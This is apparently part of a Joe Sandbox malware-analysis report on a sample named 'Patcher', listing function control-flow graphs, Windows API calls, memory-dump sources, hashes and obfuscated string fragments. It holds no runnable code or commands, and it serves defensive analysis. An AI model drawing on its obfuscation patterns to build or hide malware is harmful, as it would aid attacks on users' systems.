1039->1008 1040->1031 1041->1031 1042->1010 1043->1010
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 379355172f82dd58b3e4663ac23b4e88abb41483f89f033ef5db908875799356
                                                                                              • Instruction ID: 237d024bf5c7020773a89cdaec6c618f2d653589e85e15806d00128d144071b7
                                                                                              • Opcode Fuzzy Hash: 379355172f82dd58b3e4663ac23b4e88abb41483f89f033ef5db908875799356
                                                                                              • Instruction Fuzzy Hash: 6351D574E002089FCB08DFA9D494AEDBBF6FF89314F14846AD415AB364DB359946CF50

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __RTC_Initialize.LIBCMT ref: 6CDE72AF
                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 6CDE72C9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                              • String ID:
                                                                                              • API String ID: 2442719207-0
                                                                                              • Opcode ID: da4e1336b6ef2fa925d3fd9104587a1fa3d2dc1417484ca17c1baa34fc70f73c
                                                                                              • Instruction ID: 347da95274e1336cd2f2cf3add80278ff1d6cb46820e082cbdd6d40493fc1b37
                                                                                              • Opcode Fuzzy Hash: da4e1336b6ef2fa925d3fd9104587a1fa3d2dc1417484ca17c1baa34fc70f73c
                                                                                              • Instruction Fuzzy Hash: 0A413632E04619FBDBA19F55CC40B9F3AB5EB8975CF124019E82467B71D7304D468BB0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 733 6cde7318-6cde7329 call 6cde7ad0 736 6cde733a-6cde7341 733->736 737 6cde732b-6cde7331 733->737 739 6cde734d-6cde7361 dllmain_raw 736->739 740 6cde7343-6cde7346 736->740 737->736 738 6cde7333-6cde7335 737->738 741 6cde7413-6cde7422 738->741 743 6cde740a-6cde7411 739->743 744 6cde7367-6cde7378 dllmain_crt_dispatch 739->744 740->739 742 6cde7348-6cde734b 740->742 745 6cde737e-6cde7390 call 6cde6d60 742->745 743->741 744->743 744->745 748 6cde73b9-6cde73bb 745->748 749 6cde7392-6cde7394 745->749 751 6cde73bd-6cde73c0 748->751 752 6cde73c2-6cde73d3 dllmain_crt_dispatch 748->752 749->748 750 6cde7396-6cde73b4 call 6cde6d60 call 6cde7268 dllmain_raw 749->750 750->748 751->743 751->752 752->743 754 6cde73d5-6cde7407 dllmain_raw 752->754 754->743
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                              • String ID:
                                                                                              • API String ID: 3136044242-0
                                                                                              • Opcode ID: f949818c5f40ca645772ffbab04ae2211a27eddaadaddc347a1f1935e376fda0
                                                                                              • Instruction ID: 27f3960d0531e9c5afb78b97acf3ee8a9c45d329fbc57a4457ad5e85d2acec19
                                                                                              • Opcode Fuzzy Hash: f949818c5f40ca645772ffbab04ae2211a27eddaadaddc347a1f1935e376fda0
                                                                                              • Instruction Fuzzy Hash: 9821A371E05619FBDBA28F55CC40AAF3E79EB89B98F124119FC2457A71D3308D428BE0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6CDED1C7
                                                                                                • Part of subcall function 6CDED11C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6CDEF180,?,00000000,-00000008), ref: 6CDED17D
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDED1FF
                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6CDED21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                              • String ID:
                                                                                              • API String ID: 158306478-0
                                                                                              • Opcode ID: dd6ce470440abf671c90b823aa8929ccadb5722306fec42e5f1d7d74a3398a98
                                                                                              • Instruction ID: d641c2e85f0d4363028cca2d723b739297ca99f3d9236ef5e50625c2a5c517a1
                                                                                              • Opcode Fuzzy Hash: dd6ce470440abf671c90b823aa8929ccadb5722306fec42e5f1d7d74a3398a98
                                                                                              • Instruction Fuzzy Hash: 4211C0F1605615BEAB0117769CC9CAF7E6CEFDE69C3190526FA0192620EF20DD0585B2

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • __RTC_Initialize.LIBCMT ref: 6CDE71AE
                                                                                                • Part of subcall function 6CDE762B: InitializeSListHead.KERNEL32(6CE49FF0,6CDE71B8,6CDF83E0,00000010,6CDE7149,?,?,?,6CDE7371,?,00000001,?,?,00000001,?,6CDF8428), ref: 6CDE7630
                                                                                              • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6CDE7218
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                              • String ID:
                                                                                              • API String ID: 3231365870-0
                                                                                              • Opcode ID: 43f8947c666ad7c51a99fe3f37287a4b2ba2ced55bc392d0a67961879aacb0c9
                                                                                              • Instruction ID: 4102cd29438670feff9756b14a67fddb93a6c08b126bd72252829222576d4ce7
                                                                                              • Opcode Fuzzy Hash: 43f8947c666ad7c51a99fe3f37287a4b2ba2ced55bc392d0a67961879aacb0c9
                                                                                              • Instruction Fuzzy Hash: 2121D131648301B9EB906BB498007CA3771AF0E22DF23441AE4986BFB3DF21004EC672

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 882 6cded7bc-6cded7c1 883 6cded7c3-6cded7db 882->883 884 6cded7dd-6cded7e1 883->884 885 6cded7e9-6cded7f2 883->885 884->885 888 6cded7e3-6cded7e7 884->888 886 6cded804 885->886 887 6cded7f4-6cded7f7 885->887 891 6cded806-6cded813 GetStdHandle 886->891 889 6cded7f9-6cded7fe 887->889 890 6cded800-6cded802 887->890 892 6cded85e-6cded862 888->892 889->891 890->891 893 6cded815-6cded817 891->893 894 6cded840-6cded852 891->894 892->883 895 6cded868-6cded86b 892->895 893->894 896 6cded819-6cded822 GetFileType 893->896 894->892 897 6cded854-6cded857 894->897 896->894 898 6cded824-6cded82d 896->898 897->892 899 6cded82f-6cded833 898->899 900 6cded835-6cded838 898->900 899->892 900->892 901 6cded83a-6cded83e 900->901 901->892
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 6CDED808
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 6CDED81A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleType
                                                                                              • String ID:
                                                                                              • API String ID: 3000768030-0
                                                                                              • Opcode ID: 60888a1d9607a1f92599351d07068d51232f601027b6e82bcb7868b0d65e73ca
                                                                                              • Instruction ID: 36975dbd94c8ba7f824476a31f5de9f59475abbec98243dca2f539de752b502c
                                                                                              • Opcode Fuzzy Hash: 60888a1d9607a1f92599351d07068d51232f601027b6e82bcb7868b0d65e73ca
                                                                                              • Instruction Fuzzy Hash: FC1193726047518AD7315F3E8CC8616FAA9ABCF238B34075ED5B6869F1CB30D486C241

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 931 2690fe0-2691041 933 2691043-2691052 931->933 934 2691055-2691091 LoadLibraryW 931->934 933->934 935 269109a-26910d4 934->935 936 2691093-2691099 934->936 936->935
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 02691081
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: a34bf6bc4ee335802cae9bfec0ea45f84449422b9271d88f31e7ab436a6328f9
                                                                                              • Instruction ID: a89fa36f415fedb33b74497a03f126a5839143d10fd1df9c00647a2885c3859a
                                                                                              • Opcode Fuzzy Hash: a34bf6bc4ee335802cae9bfec0ea45f84449422b9271d88f31e7ab436a6328f9
                                                                                              • Instruction Fuzzy Hash: 0431CAB4D012989FCB14CFA9D984AEEFBF1AB49310F24806AE448B7321D735A946CF54

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 940 2690fe8-2691041 942 2691043-2691052 940->942 943 2691055-2691091 LoadLibraryW 940->943 942->943 944 269109a-26910d4 943->944 945 2691093-2691099 943->945 945->944
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 02691081
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID:
                                                                                              • API String ID: 1029625771-0
                                                                                              • Opcode ID: e5937b0acb3c99067ca3a7fdba469a27d06f57974319faf63670d31d301b94f1
                                                                                              • Instruction ID: da04110a75cbcceef7a8fe6de54c30340b96d8a49d683bac0a839b9f0933f5b5
                                                                                              • Opcode Fuzzy Hash: e5937b0acb3c99067ca3a7fdba469a27d06f57974319faf63670d31d301b94f1
                                                                                              • Instruction Fuzzy Hash: D431A7B4D01259DFCB10CFA9D984A9EFBF5BB49314F24806AE808B7320D735A945CFA4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 949 6cdee17a-6cdee186 950 6cdee1b8-6cdee1c3 call 6cdebbf4 949->950 951 6cdee188-6cdee18a 949->951 958 6cdee1c5-6cdee1c7 950->958 953 6cdee18c-6cdee18d 951->953 954 6cdee1a3-6cdee1b4 RtlAllocateHeap 951->954 953->954 956 6cdee18f-6cdee196 call 6cdee818 954->956 957 6cdee1b6 954->957 956->950 961 6cdee198-6cdee1a1 call 6cded9a0 956->961 957->958 961->950 961->954
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,6CDECAC7,6CDEDE94,?,6CDECAC7,00000220,?,?,6CDEDE94), ref: 6CDEE1AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657577407.000000006CDE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDE0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657565413.000000006CDE0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657594448.000000006CDF3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: aaf7c305c55b4e17bef79db32df33813f43f03d5f52217d052decf89a150a0d3
                                                                                              • Instruction ID: 9a9f7a8f8068ca6ad3a36dc024c057119de14294b7c0278d14a61ddf36f86aa2
                                                                                              • Opcode Fuzzy Hash: aaf7c305c55b4e17bef79db32df33813f43f03d5f52217d052decf89a150a0d3
                                                                                              • Instruction Fuzzy Hash: 92E0E531281A51E6FB10276A9C00B9A375C9B4E6A9F114122DC1496DF0CB20C48081F5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 988 2691478-269150d CloseHandle 990 269150f-2691515 988->990 991 2691516-2691558 988->991 990->991
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(?), ref: 026914FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: 60cddd63c6637cc7ea22c5eb1e3c0237147553ea23953722315fe50add7c8de2
                                                                                              • Instruction ID: 54d348e9592cba1755945bb8e3abc715ded192687070d1e5b761dcea6ffbe533
                                                                                              • Opcode Fuzzy Hash: 60cddd63c6637cc7ea22c5eb1e3c0237147553ea23953722315fe50add7c8de2
                                                                                              • Instruction Fuzzy Hash: 5331D9B4D012589FCF10CFA9D584AEEFBB4AB09320F24846AE819B7311C734A941CF68

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 995 2691480-269150d CloseHandle 997 269150f-2691515 995->997 998 2691516-2691558 995->998 997->998
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(?), ref: 026914FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657228201.0000000002690000.00000040.00000800.00020000.00000000.sdmp, Offset: 02690000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_2690000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandle
                                                                                              • String ID:
                                                                                              • API String ID: 2962429428-0
                                                                                              • Opcode ID: e7c9181390cace0a0f7e15653655ab3994417592caa975b647a1d5e6ac4b98de
                                                                                              • Instruction ID: 4d705e333c4dacb63a00045dcca928b1185689641d9b222eb3c2196d0dd8d0ca
                                                                                              • Opcode Fuzzy Hash: e7c9181390cace0a0f7e15653655ab3994417592caa975b647a1d5e6ac4b98de
                                                                                              • Instruction Fuzzy Hash: 2031A9B5D012589FCF10CFA9D584AEEFBF4AB09310F24946AE819B7350D774A941CF68
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $!$"$$$&$)$*$.$/$2$2$3$4$5$5$5$8$9$:$;$=$>$>$?$@$D$E$E$F$F$G$I$I$I$J$J$J$K$N$N$N$O$R$R$R$R$R$R$R$S$S$S$S$T$T$T$U$V$V$W$W$W$X$Y$Z$Z$Z$[$\$_$a$a$b$c$c$e$f$f$g$g$g$h$i$j$j$k$k$l$m$m$n$o$o$o$o$p$p$q$r$s$t$u$w$w$y$z$z${${$|$}$~$~
                                                                                              • API String ID: 0-241169252
                                                                                              • Opcode ID: b1772888452ce45cd48f2e906bf0788cb5cd5b9da86efbade8088f0bfc53c861
                                                                                              • Instruction ID: 9533dec62139fdc957aafeaef7866b2912cb93b84fa38a65a383029b39bce422
                                                                                              • Opcode Fuzzy Hash: b1772888452ce45cd48f2e906bf0788cb5cd5b9da86efbade8088f0bfc53c861
                                                                                              • Instruction Fuzzy Hash: 0C32011090C7E9C9EB22867C9C587DDBEA11B23318F1842DDD0DD6B7D3D6B90A85CB62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$"$#$#$#$'$'$)$*$-$0$0$1$2$8$;$=$>$?$A$A$D$D$D$F$H$I$K$L$L$M$M$M$O$O$O$P$Q$Q$R$R$S$T$T$T$V$V$Z$Z$]$^$^$^$_$`$`$a$b$c$d$d$f$h$h$i$i$l$l$n$o$p$q$q$r$r$r$s$t$t$w$y$y$y$y$z$z${${${${${${${${${$|$}
                                                                                              • API String ID: 0-4015154578
                                                                                              • Opcode ID: a228b4d6bfd944f582c200887995b59aa6e8aa789002c7a8eba53aaada564ba5
                                                                                              • Instruction ID: 7d7f35be1785daaf393fe4c995fbbf25b34242b03a8310db5a1b879a4456854b
                                                                                              • Opcode Fuzzy Hash: a228b4d6bfd944f582c200887995b59aa6e8aa789002c7a8eba53aaada564ba5
                                                                                              • Instruction Fuzzy Hash: 23C22631E082A48BCB15CA7CCC503DDBBB16B56328F1942EDD4A9AB7C1D7784D85CB91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ $"$"$$$$$%$&$($*$+$1$2$3$4$5$8$9$:$<$<$>$?$A$C$C$D$D$D$E$E$F$F$G$G$H$I$J$K$L$P$Q$S$U$U$W$Y$Y$Y$[$[$[$]$_$_$`$`$`$`$b$c$f$t$x$x$|$~
                                                                                              • API String ID: 0-3106034677
                                                                                              • Opcode ID: c5b9a8a5b109f051144e84cd24b42691e6e08be00f51fa9e5c18e900e6a18f2c
                                                                                              • Instruction ID: d797e1febcd59a9e6dab8ed4d6ad44abd398304af3d9938891d39c8169781b5b
                                                                                              • Opcode Fuzzy Hash: c5b9a8a5b109f051144e84cd24b42691e6e08be00f51fa9e5c18e900e6a18f2c
                                                                                              • Instruction Fuzzy Hash: 0B13C37560C7C08BD3209B38888439FBBF1AB96328F184A6DD5E8877D2D7798545C793
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: =?$!S#]$2E1G$8I>K$>g$D)c+$H1J3$KI$Rg$TN$U%W'$\]$_-l/$b%`'$tEwG$u5F7
                                                                                              • API String ID: 0-3662867774
                                                                                              • Opcode ID: 09179243d65148efc24872ead171a4080666fb20b5b91006b602526e4d9e2f43
                                                                                              • Instruction ID: 924ff5aa97e376a070da1680c37c56a432f9e35137f789a0732e0c6a0170509d
                                                                                              • Opcode Fuzzy Hash: 09179243d65148efc24872ead171a4080666fb20b5b91006b602526e4d9e2f43
                                                                                              • Instruction Fuzzy Hash: F442D8B520C7C58AD334CF64D442BCBBAF2AB92344F00892DD4D95B682D7B5464ACB97
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 1$2$2$3$:$D$E$S$h$j$k
                                                                                              • API String ID: 0-4017680825
                                                                                              • Opcode ID: d6c5bfd2c76fbd68f73ae84965bfb5909a90a5f86d55f7b18d97692f14ecdaf3
                                                                                              • Instruction ID: 3f66031db88eb187f1cc396ec0a198638d7a41bb7761b5372a4e90226ade4277
                                                                                              • Opcode Fuzzy Hash: d6c5bfd2c76fbd68f73ae84965bfb5909a90a5f86d55f7b18d97692f14ecdaf3
                                                                                              • Instruction Fuzzy Hash: 1841C57110C3E04AD3019A39C49035BBFE1ABD6328F688B5DE5D947782D6BAC40AC753
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: #)4l$.Vfh$;2>%$EIG@$KIEH$YX$^UG]$vU$w$}#q2
                                                                                              • API String ID: 0-1067521788
                                                                                              • Opcode ID: fe073e6c0b40336e76d3a1c8aafd90c9efebf745bba613a52674b0a06c00a51b
                                                                                              • Instruction ID: e0d9cac8a2cb89ba3fe8ba45c797b913ae956a1d0f59791995227db5a5696c45
                                                                                              • Opcode Fuzzy Hash: fe073e6c0b40336e76d3a1c8aafd90c9efebf745bba613a52674b0a06c00a51b
                                                                                              • Instruction Fuzzy Hash: A5C1C27160C3928BD311CF29846475BBFF0AFD7358F184A6CE4D59B781D279890ACBA2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !hin$-X ^$=D$Z$T$X:$[ W&$^8>$eTbj$l\hR${H{N
                                                                                              • API String ID: 0-4204190240
                                                                                              • Opcode ID: c15af351aa364fd97cd42c381c42bf47128913d0386ffd3b6bed7285b813285d
                                                                                              • Instruction ID: 5d27315d00978e12735bfe315f525e8d50ec2a5d17a52ed27752dff7a5551be9
                                                                                              • Opcode Fuzzy Hash: c15af351aa364fd97cd42c381c42bf47128913d0386ffd3b6bed7285b813285d
                                                                                              • Instruction Fuzzy Hash: E2511CB4925340CFE718CF61CA88BA87FA1BB05300F5A82EDC2596F232C7759446CF98
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: <Q2$8p>$*+$J0U6$Q45J$m$n:$t$WQ
                                                                                              • API String ID: 0-3771608038
                                                                                              • Opcode ID: e3e834579e9f3bd73e5ad3ee4f3b7eaee29074d0e0921ce408ede36c5bcc48a3
                                                                                              • Instruction ID: a313321eb851e6fe2e895107b913bc1cc99243bf0a07ea47ae860e29c87ae9d4
                                                                                              • Opcode Fuzzy Hash: e3e834579e9f3bd73e5ad3ee4f3b7eaee29074d0e0921ce408ede36c5bcc48a3
                                                                                              • Instruction Fuzzy Hash: 39D1E0B16483018BD724CF25C86176BB7F2FFD2358F188A2CE4868BB94E7799509C752
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6cde0000_Patcher_I5cxa9AN.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $Akw$1Akw$L]$RB$Vmno$]_$xy
                                                                                              • API String ID: 0-3231349015
                                                                                              • Opcode ID: db664698b596bc3370e2f0c66259ca70e89d82db1b64d1284c14dc7c6254fff4
                                                                                              • Instruction ID: e17dae468484cb6113b572f0d41808bde8cca5b0d84cb159416308f1c46ac8e2
                                                                                              • Opcode Fuzzy Hash: db664698b596bc3370e2f0c66259ca70e89d82db1b64d1284c14dc7c6254fff4
                                                                                              • Instruction Fuzzy Hash: 32C1CCB56593108BC314DF28C89176BB7F2EFC2318F298A1DE8D58B790E7788905C796
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1657608897.000000006CDFA000.00000004.00000001.01000000.00000006.sdmp, Offset: 6CDFA000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1657644959.000000006CE4B000.00000002.00000001.01000000.00000006.sdmpDownload File
